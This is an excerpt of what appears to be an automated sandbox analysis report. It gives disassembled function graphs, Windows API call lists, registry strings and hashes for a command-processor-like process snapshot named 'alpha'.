                                                                                                          • Opcode Fuzzy Hash: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
                                                                                                          • Instruction Fuzzy Hash: C8F16332A0A78285E6A6AB19F4507B9F7A4FB49788F824135D94D43774EF3CE448CB20
                                                                                                          Function 00007FF7AB135554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295registryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 579 7ff7ab135554-7ff7ab1355b9 call 7ff7ab13a640 582 7ff7ab1355bc-7ff7ab1355e8 RegOpenKeyExW 579->582 583 7ff7ab135887-7ff7ab13588e 582->583 584 7ff7ab1355ee-7ff7ab135631 RegQueryValueExW 582->584 583->582 587 7ff7ab135894-7ff7ab1358db time srand call 7ff7ab138f80 583->587 585 7ff7ab13f248-7ff7ab13f24d 584->585 586 7ff7ab135637-7ff7ab135675 RegQueryValueExW 584->586 591 7ff7ab13f260-7ff7ab13f265 585->591 592 7ff7ab13f24f-7ff7ab13f25b 585->592 588 7ff7ab135677-7ff7ab13567c 586->588 589 7ff7ab13568e-7ff7ab1356cc RegQueryValueExW 586->589 593 7ff7ab13f28b-7ff7ab13f290 588->593 594 7ff7ab135682-7ff7ab135687 588->594 595 7ff7ab1356d2-7ff7ab135710 RegQueryValueExW 589->595 596 7ff7ab13f2b6-7ff7ab13f2bb 589->596 591->586 598 7ff7ab13f26b-7ff7ab13f286 _wtol 591->598 592->586 593->589 599 7ff7ab13f296-7ff7ab13f2b1 _wtol 593->599 594->589 602 7ff7ab135729-7ff7ab135767 RegQueryValueExW 595->602 603 7ff7ab135712-7ff7ab135717 595->603 600 7ff7ab13f2ce-7ff7ab13f2d3 596->600 601 7ff7ab13f2bd-7ff7ab13f2c9 596->601 598->586 599->589 600->595 604 7ff7ab13f2d9-7ff7ab13f2f4 _wtol 600->604 601->595 607 7ff7ab135769-7ff7ab13576e 602->607 608 7ff7ab13579f-7ff7ab1357dd RegQueryValueExW 602->608 605 7ff7ab13f2f9-7ff7ab13f2fe 603->605 606 7ff7ab13571d-7ff7ab135722 603->606 604->595 605->602 609 7ff7ab13f304-7ff7ab13f31a wcstol 605->609 606->602 610 7ff7ab13f320-7ff7ab13f325 607->610 611 7ff7ab135774-7ff7ab13578f 607->611 612 7ff7ab13f3a9 608->612 613 7ff7ab1357e3-7ff7ab1357e8 608->613 609->610 616 7ff7ab13f327-7ff7ab13f33f wcstol 610->616 617 7ff7ab13f34b 610->617 618 7ff7ab13f357-7ff7ab13f35e 611->618 619 7ff7ab135795-7ff7ab135799 611->619 622 7ff7ab13f3b5-7ff7ab13f3b8 612->622 614 7ff7ab1357ee-7ff7ab135809 613->614 615 7ff7ab13f363-7ff7ab13f368 613->615 620 7ff7ab13f39a-7ff7ab13f39d 614->620 621 7ff7ab13580f-7ff7ab135813 614->621 623 7ff7ab13f36a-7ff7ab13f382 wcstol 615->623 624 7ff7ab13f38e 615->624 616->617 617->618 618->608 619->608 619->618 620->612 621->620 625 7ff7ab135819-7ff7ab135823 621->625 626 7ff7ab13f3be-7ff7ab13f3c5 622->626 627 7ff7ab13582c 622->627 623->624 624->620 625->622 628 7ff7ab135829 625->628 630 7ff7ab135832-7ff7ab135870 RegQueryValueExW 626->630 629 7ff7ab13f3ca-7ff7ab13f3d1 627->629 627->630 628->627 631 7ff7ab13f3dd-7ff7ab13f3e2 629->631 630->631 632 7ff7ab135876-7ff7ab135882 RegCloseKey 630->632 633 7ff7ab13f3e4-7ff7ab13f412 ExpandEnvironmentStringsW 631->633 634 7ff7ab13f433-7ff7ab13f439 631->634 632->583 636 7ff7ab13f428 633->636 637 7ff7ab13f414-7ff7ab13f426 call 7ff7ab1313e0 633->637 634->632 635 7ff7ab13f43f-7ff7ab13f44c call 7ff7ab12b900 634->635 635->632 638 7ff7ab13f42e 636->638 637->638 638->634
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue$CloseOpensrandtime
                                                                                                          • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                                                          • API String ID: 145004033-3846321370
                                                                                                          • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                          • Instruction ID: f8a97949ae12ec7b39df0bd14b60bb671d814cd3c4b1620992e8d5cfff4043b8
                                                                                                          • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                                                                          • Instruction Fuzzy Hash: 79E1873651EA82C6E792AB18F49457AF7A0FB88748FC15135E58E03A78EF7CD548CB10
                                                                                                          Function 00007FF7AB1337D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 821 7ff7ab1337d8-7ff7ab133887 GetCurrentThreadId OpenThread call 7ff7ab1304f4 HeapSetInformation RegOpenKeyExW 824 7ff7ab13e9f8-7ff7ab13ea3b RegQueryValueExW RegCloseKey 821->824 825 7ff7ab13388d-7ff7ab1338eb call 7ff7ab135920 GetConsoleOutputCP GetCPInfo 821->825 827 7ff7ab13ea41-7ff7ab13ea59 GetThreadLocale 824->827 825->827 831 7ff7ab1338f1-7ff7ab133913 memset 825->831 829 7ff7ab13ea5b-7ff7ab13ea67 827->829 830 7ff7ab13ea74-7ff7ab13ea77 827->830 829->830 834 7ff7ab13ea79-7ff7ab13ea7d 830->834 835 7ff7ab13ea94-7ff7ab13ea96 830->835 832 7ff7ab133919-7ff7ab133935 call 7ff7ab134d5c 831->832 833 7ff7ab13eaa5 831->833 841 7ff7ab13393b-7ff7ab133942 832->841 842 7ff7ab13eae2-7ff7ab13eaff call 7ff7ab123240 call 7ff7ab148530 call 7ff7ab134c1c 832->842 838 7ff7ab13eaa8-7ff7ab13eab4 833->838 834->835 837 7ff7ab13ea7f-7ff7ab13ea89 834->837 835->833 837->835 838->832 840 7ff7ab13eaba-7ff7ab13eac3 838->840 843 7ff7ab13eacb-7ff7ab13eace 840->843 845 7ff7ab13eb27-7ff7ab13eb40 _setjmp 841->845 846 7ff7ab133948-7ff7ab133962 _setjmp 841->846 851 7ff7ab13eb00-7ff7ab13eb0d 842->851 847 7ff7ab13ead0-7ff7ab13eadb 843->847 848 7ff7ab13eac5-7ff7ab13eac9 843->848 852 7ff7ab1339fe-7ff7ab133a05 call 7ff7ab134c1c 845->852 853 7ff7ab13eb46-7ff7ab13eb49 845->853 850 7ff7ab133968-7ff7ab13396d 846->850 846->851 847->838 854 7ff7ab13eadd 847->854 848->843 856 7ff7ab1339b9-7ff7ab1339bb 850->856 857 7ff7ab13396f 850->857 866 7ff7ab13eb15-7ff7ab13eb1f call 7ff7ab134c1c 851->866 852->824 859 7ff7ab13eb4b-7ff7ab13eb65 call 7ff7ab123240 call 7ff7ab148530 call 7ff7ab134c1c 853->859 860 7ff7ab13eb66-7ff7ab13eb6f call 7ff7ab1301b8 853->860 854->832 861 7ff7ab1339c1-7ff7ab1339c3 call 7ff7ab134c1c 856->861 862 7ff7ab13eb20 856->862 865 7ff7ab133972-7ff7ab13397d 857->865 859->860 880 7ff7ab13eb87-7ff7ab13eb89 call 7ff7ab1386f0 860->880 881 7ff7ab13eb71-7ff7ab13eb82 _setmode 860->881 877 7ff7ab1339c8 861->877 862->845 873 7ff7ab1339c9-7ff7ab1339de call 7ff7ab12df60 865->873 874 7ff7ab13397f-7ff7ab133984 865->874 866->862 873->866 889 7ff7ab1339e4-7ff7ab1339e8 873->889 874->865 882 7ff7ab133986-7ff7ab1339ae call 7ff7ab130580 GetConsoleOutputCP GetCPInfo call 7ff7ab1304f4 874->882 877->873 890 7ff7ab13eb8e-7ff7ab13ebad call 7ff7ab1358e4 call 7ff7ab12df60 880->890 881->880 898 7ff7ab1339b3 882->898 889->852 893 7ff7ab1339ea-7ff7ab1339ef call 7ff7ab12be00 889->893 902 7ff7ab13ebaf-7ff7ab13ebb3 890->902 899 7ff7ab1339f4-7ff7ab1339fc 893->899 898->856 899->874 902->852 903 7ff7ab13ebb9-7ff7ab13ec24 call 7ff7ab1358e4 GetConsoleOutputCP GetCPInfo call 7ff7ab1304f4 call 7ff7ab12be00 call 7ff7ab130580 GetConsoleOutputCP GetCPInfo call 7ff7ab1304f4 902->903 903->890
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                          • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                          • API String ID: 2624720099-1920437939
                                                                                                          • Opcode ID: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                                                                                          • Instruction ID: 97f1c950924bc66f5b2d8f2f30aa24386a8ff562a316357f0ecf9ee52a76767a
                                                                                                          • Opcode Fuzzy Hash: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                                                                                          • Instruction Fuzzy Hash: 79C1E531E0A7428AF75ABB2CF4505B8FAA0FF4970CF965134D91E476B5EE3CA4488720
                                                                                                          Function 00007FF7AB13823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1118 7ff7ab13823c-7ff7ab13829b FindFirstFileExW 1119 7ff7ab1382cd-7ff7ab1382df 1118->1119 1120 7ff7ab13829d-7ff7ab1382a9 GetLastError 1118->1120 1124 7ff7ab138365-7ff7ab13837b FindNextFileW 1119->1124 1125 7ff7ab1382e5-7ff7ab1382ee 1119->1125 1121 7ff7ab1382af 1120->1121 1122 7ff7ab1382b1-7ff7ab1382cb 1121->1122 1126 7ff7ab13837d-7ff7ab138380 1124->1126 1127 7ff7ab1383d0-7ff7ab1383e5 FindClose 1124->1127 1128 7ff7ab1382f1-7ff7ab1382f4 1125->1128 1126->1119 1129 7ff7ab138386 1126->1129 1127->1128 1130 7ff7ab138329-7ff7ab13832b 1128->1130 1131 7ff7ab1382f6-7ff7ab138300 1128->1131 1129->1120 1130->1121 1134 7ff7ab13832d 1130->1134 1132 7ff7ab138332-7ff7ab138353 GetProcessHeap HeapAlloc 1131->1132 1133 7ff7ab138302-7ff7ab13830e 1131->1133 1137 7ff7ab138356-7ff7ab138363 1132->1137 1135 7ff7ab13838b-7ff7ab1383c2 GetProcessHeap HeapReAlloc 1133->1135 1136 7ff7ab138310-7ff7ab138313 1133->1136 1134->1120 1138 7ff7ab1450f8-7ff7ab14511e GetLastError FindClose 1135->1138 1139 7ff7ab1383c8-7ff7ab1383ce 1135->1139 1140 7ff7ab138327 1136->1140 1141 7ff7ab138315-7ff7ab138323 1136->1141 1137->1136 1138->1122 1139->1137 1140->1130 1141->1140
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFileFindFirstLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 873889042-0
                                                                                                          • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                          • Instruction ID: 1f9a49b581796190981ee41e3aee0d10403fa77d068c9c60447adf6263e3f43a
                                                                                                          • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                          • Instruction Fuzzy Hash: 7C515D36A0AB4686E746AF19F494179FBA1FB49B89F868131CA1E03370DF3CE554C720
                                                                                                          Function 00007FF7AB132978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1142 7ff7ab132978-7ff7ab1329b6 1143 7ff7ab1329b9-7ff7ab1329c1 1142->1143 1143->1143 1144 7ff7ab1329c3-7ff7ab1329c5 1143->1144 1145 7ff7ab1329cb-7ff7ab1329cf 1144->1145 1146 7ff7ab13e441 1144->1146 1147 7ff7ab1329d2-7ff7ab1329da 1145->1147 1148 7ff7ab132a1e-7ff7ab132a3e FindFirstFileW 1147->1148 1149 7ff7ab1329dc-7ff7ab1329e1 1147->1149 1151 7ff7ab13e435-7ff7ab13e439 1148->1151 1152 7ff7ab132a44-7ff7ab132a5c FindClose 1148->1152 1149->1148 1150 7ff7ab1329e3-7ff7ab1329eb 1149->1150 1150->1147 1153 7ff7ab1329ed-7ff7ab132a1c call 7ff7ab138f80 1150->1153 1151->1146 1154 7ff7ab132a62-7ff7ab132a6e 1152->1154 1155 7ff7ab132ae3-7ff7ab132ae5 1152->1155 1159 7ff7ab132a70-7ff7ab132a78 1154->1159 1156 7ff7ab13e3f7-7ff7ab13e3ff 1155->1156 1157 7ff7ab132aeb-7ff7ab132b10 _wcsnicmp 1155->1157 1157->1154 1160 7ff7ab132b16-7ff7ab13e3f1 _wcsicmp 1157->1160 1159->1159 1162 7ff7ab132a7a-7ff7ab132a8d 1159->1162 1160->1154 1160->1156 1162->1146 1163 7ff7ab132a93-7ff7ab132a97 1162->1163 1165 7ff7ab132a9d-7ff7ab132ade memmove call 7ff7ab1313e0 1163->1165 1166 7ff7ab13e404-7ff7ab13e407 1163->1166 1165->1150 1168 7ff7ab13e40b-7ff7ab13e413 1166->1168 1168->1168 1170 7ff7ab13e415-7ff7ab13e42b memmove 1168->1170 1170->1151
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                          • Instruction ID: 349e5c97cd19fec906a0727a699801041d374d93d39797e34afd9b9f34d35c71
                                                                                                          • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                          • Instruction Fuzzy Hash: 52512C22B0A68185EAB5BF1DF54427AE650FB447A8FC64230DE6E476F0EF3CE4498350
                                                                                                          Function 00007FF7AB134D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 643 7ff7ab134d5c-7ff7ab134e4b InitializeCriticalSection call 7ff7ab1358e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff7ab130580 call 7ff7ab134a14 call 7ff7ab134ad0 call 7ff7ab135554 GetCommandLineW 654 7ff7ab134e4d-7ff7ab134e54 643->654 654->654 655 7ff7ab134e56-7ff7ab134e61 654->655 656 7ff7ab134e67-7ff7ab134e7b call 7ff7ab132e44 655->656 657 7ff7ab1351cf-7ff7ab1351e3 call 7ff7ab123278 call 7ff7ab134c1c 655->657 662 7ff7ab1351ba-7ff7ab1351ce call 7ff7ab123278 call 7ff7ab134c1c 656->662 663 7ff7ab134e81-7ff7ab134ec3 GetCommandLineW call 7ff7ab1313e0 call 7ff7ab12ca40 656->663 662->657 663->662 674 7ff7ab134ec9-7ff7ab134ee8 call 7ff7ab13417c call 7ff7ab132394 663->674 678 7ff7ab134eed-7ff7ab134ef5 674->678 678->678 679 7ff7ab134ef7-7ff7ab134f1f call 7ff7ab12aa54 678->679 682 7ff7ab134f21-7ff7ab134f30 679->682 683 7ff7ab134f95-7ff7ab134fee GetConsoleOutputCP GetCPInfo call 7ff7ab1351ec GetProcessHeap HeapAlloc 679->683 682->683 684 7ff7ab134f32-7ff7ab134f39 682->684 689 7ff7ab135012-7ff7ab135018 683->689 690 7ff7ab134ff0-7ff7ab135006 GetConsoleTitleW 683->690 684->683 686 7ff7ab134f3b-7ff7ab134f77 call 7ff7ab123278 GetWindowsDirectoryW 684->686 696 7ff7ab134f7d-7ff7ab134f90 call 7ff7ab133c24 686->696 697 7ff7ab1351b1-7ff7ab1351b9 call 7ff7ab134c1c 686->697 692 7ff7ab13507a-7ff7ab13507e 689->692 693 7ff7ab13501a-7ff7ab135024 call 7ff7ab133578 689->693 690->689 691 7ff7ab135008-7ff7ab13500f 690->691 691->689 698 7ff7ab1350eb-7ff7ab135161 GetModuleHandleW GetProcAddress * 3 692->698 699 7ff7ab135080-7ff7ab1350b3 call 7ff7ab14b89c call 7ff7ab12586c call 7ff7ab123240 call 7ff7ab133448 692->699 693->692 707 7ff7ab135026-7ff7ab135030 693->707 696->683 697->662 704 7ff7ab13516f 698->704 705 7ff7ab135163-7ff7ab135167 698->705 724 7ff7ab1350d2-7ff7ab1350d7 call 7ff7ab123278 699->724 725 7ff7ab1350b5-7ff7ab1350d0 call 7ff7ab133448 * 2 699->725 706 7ff7ab135172-7ff7ab1351af free call 7ff7ab138f80 704->706 705->704 710 7ff7ab135169-7ff7ab13516d 705->710 712 7ff7ab135032-7ff7ab135059 GetStdHandle GetConsoleScreenBufferInfo 707->712 713 7ff7ab135075 call 7ff7ab14cff0 707->713 710->704 710->706 717 7ff7ab135069-7ff7ab135073 712->717 718 7ff7ab13505b-7ff7ab135067 712->718 713->692 717->692 717->713 718->692 729 7ff7ab1350dc-7ff7ab1350e6 GlobalFree 724->729 725->729 729->698
                                                                                                          APIs
                                                                                                          • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134D9A
                                                                                                            • Part of subcall function 00007FF7AB1358E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7AB14C6DB), ref: 00007FF7AB1358EF
                                                                                                          • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134DBB
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB134DCA
                                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134DE0
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB134DEE
                                                                                                          • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134E04
                                                                                                            • Part of subcall function 00007FF7AB130580: _get_osfhandle.MSVCRT ref: 00007FF7AB130589
                                                                                                            • Part of subcall function 00007FF7AB130580: SetConsoleMode.KERNELBASE ref: 00007FF7AB13059E
                                                                                                            • Part of subcall function 00007FF7AB130580: _get_osfhandle.MSVCRT ref: 00007FF7AB1305AF
                                                                                                            • Part of subcall function 00007FF7AB130580: GetConsoleMode.KERNELBASE ref: 00007FF7AB1305C5
                                                                                                            • Part of subcall function 00007FF7AB130580: _get_osfhandle.MSVCRT ref: 00007FF7AB1305EF
                                                                                                            • Part of subcall function 00007FF7AB130580: GetConsoleMode.KERNELBASE ref: 00007FF7AB130605
                                                                                                            • Part of subcall function 00007FF7AB130580: _get_osfhandle.MSVCRT ref: 00007FF7AB130632
                                                                                                            • Part of subcall function 00007FF7AB130580: SetConsoleMode.KERNELBASE ref: 00007FF7AB130647
                                                                                                            • Part of subcall function 00007FF7AB134A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A28
                                                                                                            • Part of subcall function 00007FF7AB134A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A66
                                                                                                            • Part of subcall function 00007FF7AB134A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A7D
                                                                                                            • Part of subcall function 00007FF7AB134A14: memmove.MSVCRT(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A9A
                                                                                                            • Part of subcall function 00007FF7AB134A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134AA2
                                                                                                            • Part of subcall function 00007FF7AB134AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB128798), ref: 00007FF7AB134AD6
                                                                                                            • Part of subcall function 00007FF7AB134AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB128798), ref: 00007FF7AB134AEF
                                                                                                            • Part of subcall function 00007FF7AB135554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7AB134E35), ref: 00007FF7AB1355DA
                                                                                                            • Part of subcall function 00007FF7AB135554: RegQueryValueExW.KERNELBASE ref: 00007FF7AB135623
                                                                                                            • Part of subcall function 00007FF7AB135554: RegQueryValueExW.KERNELBASE ref: 00007FF7AB135667
                                                                                                            • Part of subcall function 00007FF7AB135554: RegQueryValueExW.KERNELBASE ref: 00007FF7AB1356BE
                                                                                                            • Part of subcall function 00007FF7AB135554: RegQueryValueExW.KERNELBASE ref: 00007FF7AB135702
                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134E35
                                                                                                          • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134E81
                                                                                                          • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134F69
                                                                                                          • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134F95
                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134FB0
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134FC1
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134FD8
                                                                                                          • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB134FF8
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB135037
                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB13504B
                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB1350DF
                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB1350F2
                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB13510F
                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB135130
                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB13514A
                                                                                                          • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7AB135175
                                                                                                            • Part of subcall function 00007FF7AB133578: _get_osfhandle.MSVCRT ref: 00007FF7AB133584
                                                                                                            • Part of subcall function 00007FF7AB133578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB13359C
                                                                                                            • Part of subcall function 00007FF7AB133578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335C3
